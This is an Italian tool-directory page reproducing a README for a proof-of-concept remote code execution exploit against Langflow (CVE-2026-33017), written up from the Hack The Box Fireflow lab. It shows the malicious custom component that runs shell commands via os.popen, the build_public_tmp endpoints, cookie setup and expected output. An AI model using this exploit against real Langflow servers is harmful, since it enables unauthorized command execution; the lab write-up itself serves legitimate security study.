Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33017-FireFlow — Proof-of-concept RCE per Langflow CVE-2026-33017 che utilizza un componente personalizzato dannoso per eseguire comandi del sistema operativo tramite build_public_tmp e recuperare l'output dagli eventi dei job. | Kitploit
Strumenti/GitHubGitHub/l4st98/cve-2026-33017-fireflow
ExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubl4st98/cve-2026-33017-fireflow

CVE-2026-33017-FireFlow

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Proof-of-concept RCE per Langflow CVE-2026-33017 che utilizza un componente personalizzato dannoso per eseguire comandi del sistema operativo tramite build_public_tmp e recuperare l'output dagli eventi dei job.

Vedi Repository
2 giorni faNon ancora revisionato

Langflow RCE PoC — HTB Fireflow

PoC utilizzato durante la risoluzione della Fireflow, macchina di Hack The Box, per dimostrare lo sfruttamento dell'esecuzione arbitraria di codice tramite un componente personalizzato di Langflow.

Avviso: questo materiale è condiviso esclusivamente a scopo educativo, per lo studio della sicurezza e per la riproduzione dello scenario del CTF. Utilizza il PoC solo in ambienti propri, laboratori o sistemi per i quali hai un'autorizzazione esplicita.

Sul PoC

Lo script automatizza l'invio di un flusso a un'istanza vulnerabile di Langflow.

L'idea generale è:

  1. Creare un componente personalizzato contenente codice Python.
  2. Inviare il componente all'endpoint di build del flusso.
  3. Avviare l'elaborazione del flusso.
  4. Consultare gli eventi dell'esecuzione.
  5. Estrarre e visualizzare il risultato restituito dal componente.

Nel contesto di HTB Fireflow, ho usato questo PoC per validare la possibilità di eseguire comandi nel contesto del processo di Langflow.

Il codice usato nel componente esegue:

root@kitploit:~
whoami
hostname
id
pwd
ls -la

Puoi modificarlo. Questi comandi servono solo a identificare il contesto di esecuzione e a verificare l'accesso al sistema durante il laboratorio.

Configurazione

Prima di eseguire lo script, compila le tre variabili all'inizio del file:

root@kitploit:~
BASE = ""       # URL dell'istanza di Langflow
FLOW_ID = ""    # ID del flusso
CLIENT_ID = ""  # Client ID/cookie utilizzato dall'applicazione

BASE

È l'URL base dell'istanza in test.

Esempio:

root@kitploit:~
BASE = "http://TARGET"

Non includere /api/... nel valore, perché gli endpoint vengono aggiunti successivamente dallo script.

FLOW_ID

È l'identificatore del flusso usato dall'endpoint build_public_tmp.

Compila con l'ID corrispondente al flusso trovato durante l'enumerazione del laboratorio:

root@kitploit:~
FLOW_ID = "SEU_FLOW_ID"

CLIENT_ID

È il valore usato come cookie client_id dall'applicazione:

root@kitploit:~
CLIENT_ID = "SEU_CLIENT_ID"

Lo script in seguito crea la sessione e configura automaticamente questo cookie:

root@kitploit:~
session = requests.Session()
session.verify = False
session.cookies.set("client_id", CLIENT_ID)

Funzionamento

La prima richiesta viene inviata a:

root@kitploit:~
/api/v1/build_public_tmp/{FLOW_ID}/flow

Il JSON inviato contiene un nodo genericNode il cui tipo è il componente personalizzato ExploitComp.

La parte rilevante del componente è:

root@kitploit:~
class ExploitComp(Component):
    ...

    def r(self) -> Data:
        result = os.popen(
            "whoami; hostname; id; pwd; ls -la"
        ).read()

        return Data(data={
            "result": result
        })

Dopo che il server accetta il flusso, la risposta fornisce un job_id.

Lo script usa questo identificatore per interrogare:

root@kitploit:~
/api/v1/build_public_tmp/{job_id}/events

Infine, gli eventi vengono elaborati e il risultato prodotto dal componente viene mostrato nel terminale.

Esecuzione

Con le variabili configurate:

root@kitploit:~
python3 poc.py

Un'esecuzione riuscita dovrebbe produrre qualcosa di simile a:

root@kitploit:~
Pwning.....
HTTP: 200
Job ID: <job_id>

Events (/{job_id}/events):

### OUTPUT
----------------------------------------
<risultato dell'esecuzione>
----------------------------------------
Build completata in <tempo>s

Il contenuto esatto dell'output dipende da utente, hostname, permessi e directory di lavoro dell'ambiente vulnerabile.

Struttura del PoC

In sintesi:

root@kitploit:~
poc.py
 │
 ├── configura BASE / FLOW_ID / CLIENT_ID
 │
 ├── crea il componente personalizzato
 │
 ├── genera il payload JSON
 │
 ├── POST /api/v1/build_public_tmp/{FLOW_ID}/flow
 │
 ├── ottiene il job_id
 │
 ├── GET /api/v1/build_public_tmp/{job_id}/events
 │
 └── estrae il risultato dal componente

Modificare il comando

Per riprodurre il comportamento nel laboratorio, il comando eseguito si trova dentro ExploitComp.r():

root@kitploit:~
result = os.popen(
    "whoami; hostname; id; pwd; ls -la"
).read()

In un ambiente CTF autorizzato, questa parte può essere modificata con comandi adatti all'obiettivo della fase del laboratorio.

Raccomandazione: mantieni il PoC limitato all'ambiente CTF/lab ed evita di usarlo contro sistemi di terze parti.

Requisiti

Lo script usa Python 3 e le librerie:

root@kitploit:~
pip install requests urllib3

Poi:

root@kitploit:~
python3 poc.py

Contesto HTB Fireflow

Questo è stato il PoC che ho usato durante il CTF/lab Fireflow di Hack The Box per validare la vulnerabilità e ottenere l'esecuzione di comandi nel contesto del servizio.

L'intenzione di questo README è documentare la tecnica in modo riproducibile per chi sta studiando la macchina, cercando vulnerabilità legate a Langflow o imparando la sicurezza delle applicazioni Python.

Disclaimer

Questo progetto non ha lo scopo di incoraggiare accessi non autorizzati.

Il codice deve essere usato solo su:

  • macchine di Hack The Box;
  • CTF e ambienti di formazione;
  • laboratori personali;
  • sistemi esplicitamente autorizzati per test di sicurezza.

L'autore non è responsabile dell'uso di questo codice contro sistemi senza autorizzazione.

Usa con responsabilità.

Scarica lo strumento